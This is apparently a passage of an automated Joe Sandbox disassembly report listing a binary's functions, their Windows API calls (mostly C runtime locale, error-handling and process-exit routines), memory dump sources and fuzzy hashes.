1#SNAN, xrefs: 00436EF9
1#QNAN, xrefs: 00436F00
1#INF, xrefs: 00436F07
1#IND, xrefs: 00436EF2

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d9a5aac03e2fcd026a5b5a6c9588797d91b5b11ad7c443387d8ec1016d734be7
Instruction ID: 941755b01e86c70056bd046e78af6cb5045ff83f2c7ff37e933803c4935b53bb
Opcode Fuzzy Hash: d9a5aac03e2fcd026a5b5a6c9588797d91b5b11ad7c443387d8ec1016d734be7
Instruction Fuzzy Hash: C3C25871E086299FDB25CE28DD407EAB3B5EB49304F1591EBD84DE7240E778AE818F44

Function 00433BB3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00433ED2,?,00000000), ref: 00433C4C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00433ED2,?,00000000), ref: 00433C75
GetACP.KERNEL32(?,?,00433ED2,?,00000000), ref: 00433C8A

Strings

OCP, xrefs: 00433C07
ACP, xrefs: 00433BD1

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 23969989261f9874f2a78018dafaa6921b6af1ad2ab302043583120471540286
Instruction ID: 67b7ada60e928458a6b90df1d31015f4566fe5f1f703029c50d6812088cbf059
Opcode Fuzzy Hash: 23969989261f9874f2a78018dafaa6921b6af1ad2ab302043583120471540286
Instruction Fuzzy Hash: 2A21DB33600104A6EB34CF15C905B97B3A6EB58F66F56B026E909E7310E73ADF41C358

Function 00433D87 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A039
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A046

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00433E93
IsValidCodePage.KERNEL32(00000000), ref: 00433EEE
IsValidLocale.KERNEL32(?,00000001), ref: 00433EFD
GetLocaleInfoW.KERNEL32(?,00001001,004288B6,00000040,?,004289D6,00000055,00000000,?,?,00000055,00000000), ref: 00433F45
GetLocaleInfoW.KERNEL32(?,00001002,00428936,00000040), ref: 00433F64

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 4477d88857c07c28974a26f7e64c23977dec48d56cbfc23d796b3b8faac52b40
Instruction ID: 6c4be7d17ff7275c65bb69e1d0fbb282b94c00a599808c1ce092141a39e48ead
Opcode Fuzzy Hash: 4477d88857c07c28974a26f7e64c23977dec48d56cbfc23d796b3b8faac52b40
Instruction Fuzzy Hash: A3518371A002059BEF20DFA5DC42ABB73B8EF08702F14556AF914E7290D7789F408B69

Function 00426A30 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

!mC, xrefs: 00426A4D, 00426BF8, 00426E1C, 00426DB6, 00426C46, 00426BD4
!mC, xrefs: 00426E98, 00426C82, 00426B11

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID: !mC$!mC
API String ID: 0-1992737333
Opcode ID: e672d7c4722bd303605c32bba7ac0ab271740c339db647ffcfe7f4f620bb1c48
Instruction ID: ee98aecc671c485f20896f6ed7d8fd489de8d9ff947f54ba49564d8622f2baa2
Opcode Fuzzy Hash: e672d7c4722bd303605c32bba7ac0ab271740c339db647ffcfe7f4f620bb1c48
Instruction Fuzzy Hash: F5022D71F002299BDF14CFA9D9806AEBBF1EF48314F66816AD819E7384D735A941CB84

Function 0043344F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004288BD,?,?,?,?,00428314,?,00000004), ref: 00433531
_wcschr.LIBVCRUNTIME ref: 004335C1
_wcschr.LIBVCRUNTIME ref: 004335CF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004288BD,00000000,004289DD), ref: 00433672

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 9903523928d29919e9be08c7a21a5ff0fc341bce6b5740c944e3fb08a2730104
Instruction ID: 8157dbe6158d8c9839e35418051ae299353e25bb2dca879b829ccaadcc172a81
Opcode Fuzzy Hash: 9903523928d29919e9be08c7a21a5ff0fc341bce6b5740c944e3fb08a2730104
Instruction Fuzzy Hash: 8561F371A04202AAD725AF25CC47AAB77A8EF08706F14102BF905D7281EA78EA418769

Function 0043383A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A039
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A046

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043388E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004338DF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043399F

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ec3af03bc488cfba1adb87db0406dab309f52acde51a447259125323f15e7054
Instruction ID: 7686008b76060d739a837259d593398bd9ddd2b0904b7932026d4ec62ffdbf83
Opcode Fuzzy Hash: ec3af03bc488cfba1adb87db0406dab309f52acde51a447259125323f15e7054
Instruction Fuzzy Hash: FD61A571500207DBEB289F28CC82B7A77A8EF08306F1451BBE905D6681E77CEE51DB58

Function 004231FF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004232F7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00423301
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042330E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: df265f4fc87b178ba506eee6d764b7a7e32709aa329b1334df0a1a8b5238a7c6
Instruction ID: b197f1417423d87a48ccd734b78e582bf3e54980e6c1bdebb0bf55368c16cb3b
Opcode Fuzzy Hash: df265f4fc87b178ba506eee6d764b7a7e32709aa329b1334df0a1a8b5238a7c6
Instruction Fuzzy Hash: 7631D5759012289BCB21DF65D9887DDBBB8BF08310F5045EAE80CA7291EB349F818F48

Function 00427F60 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00427F36,00000003,0044EAA8,0000000C,0042808D,00000003,00000002,00000000,?,00425F57,00000003), ref: 00427F81
TerminateProcess.KERNEL32(00000000,?,00427F36,00000003,0044EAA8,0000000C,0042808D,00000003,00000002,00000000,?,00425F57,00000003), ref: 00427F88
ExitProcess.KERNEL32 ref: 00427F9A

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5c7b4931b426e81105b1a572659ab3d51cb336a345eaa8acadfdf799388be4c9
Instruction ID: 3d3941787f2222849c80e8e1ce3ada8af6ec3c1ee611026d3e7d71f3c00bd907
Opcode Fuzzy Hash: 5c7b4931b426e81105b1a572659ab3d51cb336a345eaa8acadfdf799388be4c9
Instruction Fuzzy Hash: 25E0B631208218ABCF116F65EE09A593B6AEF85785B514029FA058A271DB3DDD42DB88

Function 00430E37 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00430F01

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 7ecb0fcfebc6e9c42f95ee9286cde4be5e65bc987eaca39abb35b50300f5036b
Instruction ID: 58c891858a0c245ba95c31f2853e50a068c3660bfe23be31b54ab9b5147201da
Opcode Fuzzy Hash: 7ecb0fcfebc6e9c42f95ee9286cde4be5e65bc987eaca39abb35b50300f5036b
Instruction Fuzzy Hash: BA414D72600218ABCB309F79DC99EBB7778EB84714F50066EF905D7280E6749E81CB58

Function 00433712 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

EnumSystemLocalesW.KERNEL32(0043383A,00000001,00000000,?,004288B6,?,00433E67,00000000,?,?,?), ref: 00433784

Strings

g>C, xrefs: 00433759

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: g>C
API String ID: 1084509184-482938848
Opcode ID: 347082d5e177251e50abdf500a0a2aa68404af7bbcbce495803baca6d0b36ae3
Instruction ID: 51d43bc087fc2e17459e864baae3d8592e905d12c26d595f0d4abc312b177662
Opcode Fuzzy Hash: 347082d5e177251e50abdf500a0a2aa68404af7bbcbce495803baca6d0b36ae3
Instruction Fuzzy Hash: 6011E97A2007055FDB18AF39C8916BBBB91FF8436AF15842DE98687740D375BA43C744

Function 0042D32C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00428314,?,00000004), ref: 0042D37F

Strings

GetLocaleInfoEx, xrefs: 0042D33D, 0042D347

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 87fafb829f3b59e062701097bae38493bd20f1a97eb6c2adcc8be0fa77cbf355
Instruction ID: b0a28a94c7857058b0c89e4c2b4e4391378e134ff4201c5adda14d8daf0e044c
Opcode Fuzzy Hash: 87fafb829f3b59e062701097bae38493bd20f1a97eb6c2adcc8be0fa77cbf355
Instruction Fuzzy Hash: F4F02431B40328BBDB01AF61EC02F6E3F61EF04B54F50002AFD05662A1CB799E619ADD

Function 0042F093 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0042F08E,?,?,00000008,?,?,004376B7,00000000), ref: 0042F2C0

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 061c330d74a4707c419fb1c4d5b83e92ba5fc4072e6baa3e2ee474afd249b5f1
Instruction ID: dcdbb9bfe5be994fb81d6f6591cf43b7dfe205c4b4ad8219bc69617a5261e280
Opcode Fuzzy Hash: 061c330d74a4707c419fb1c4d5b83e92ba5fc4072e6baa3e2ee474afd249b5f1
Instruction Fuzzy Hash: 6AB16B31210618CFD714CF28D486B657BF0FF05364FA586A9E899CF2A1C33AE996CB44

Function 00433A8A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A039
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A046

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00433ADE

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 8c717539bc648abf0d2c5d9ac6dc387c4fdbfc57df1d426b3812ab38035a2f0a
Instruction ID: dd588af10363d341fda4715428a2279b173d25272da06c636c66070d0b078cdc
Opcode Fuzzy Hash: 8c717539bc648abf0d2c5d9ac6dc387c4fdbfc57df1d426b3812ab38035a2f0a
Instruction Fuzzy Hash: 422186329102069BDB24AF15DC41BBBB7A8EB08715F1011BBF901D6142EB79EE45C759

Function 00433CBA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00433A58,00000000,00000000,?), ref: 00433CE6

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 3376673f5f7c116e5b2064e7434290b17800eb203dfd2a9d12e68749528eaa10
Instruction ID: 10be2d502356f11bd7985dee1271c664f0ded8c1b1b2b1db54fbd5d10376fdf2
Opcode Fuzzy Hash: 3376673f5f7c116e5b2064e7434290b17800eb203dfd2a9d12e68749528eaa10
Instruction Fuzzy Hash: 0BF0F932A001197BEB289F65C806BBB7BA8EB44755F15542AFC05E3240EA78FE41C6D4

Function 004337AD Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

EnumSystemLocalesW.KERNEL32(00433A8A,00000001,?,?,004288B6,?,00433E2B,004288B6,?,?,?,?,?,004288B6,?,?), ref: 004337F9

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 37f9f5a8017dfe4183832e79a061086b4372a7ca9088262a534f16c1d719ab11
Instruction ID: 99b7eab48ea73407b93adfe2ea04208784249099dd75bda9c37835652fb51dcf
Opcode Fuzzy Hash: 37f9f5a8017dfe4183832e79a061086b4372a7ca9088262a534f16c1d719ab11
Instruction Fuzzy Hash: A9F022723003046FDB186F3A9C81A6B7BD0EF85769F15802EFA41CB650D775ED028658

Function 0042CF39 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00426385: EnterCriticalSection.KERNEL32(?,?,00429D7A,?,0044EB70,00000008,00429E48,?,?,?), ref: 00426394

EnumSystemLocalesW.KERNEL32(0042CEF3,00000001,0044ECF0,0000000C), ref: 0042CF71

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d4d65ed26e057f7f701be5cb73d13cb0fdada9115ac08d3a8e3de805cf3f9ff8
Instruction ID: eafdb135060fc649495f14e6a981e75de9336417697223fd5416a103bdede7f1
Opcode Fuzzy Hash: d4d65ed26e057f7f701be5cb73d13cb0fdada9115ac08d3a8e3de805cf3f9ff8
Instruction Fuzzy Hash: B3F04472A103109FD700EF65E986B9D37F0AB44725F11416AF910EB2E6CB7889408B49

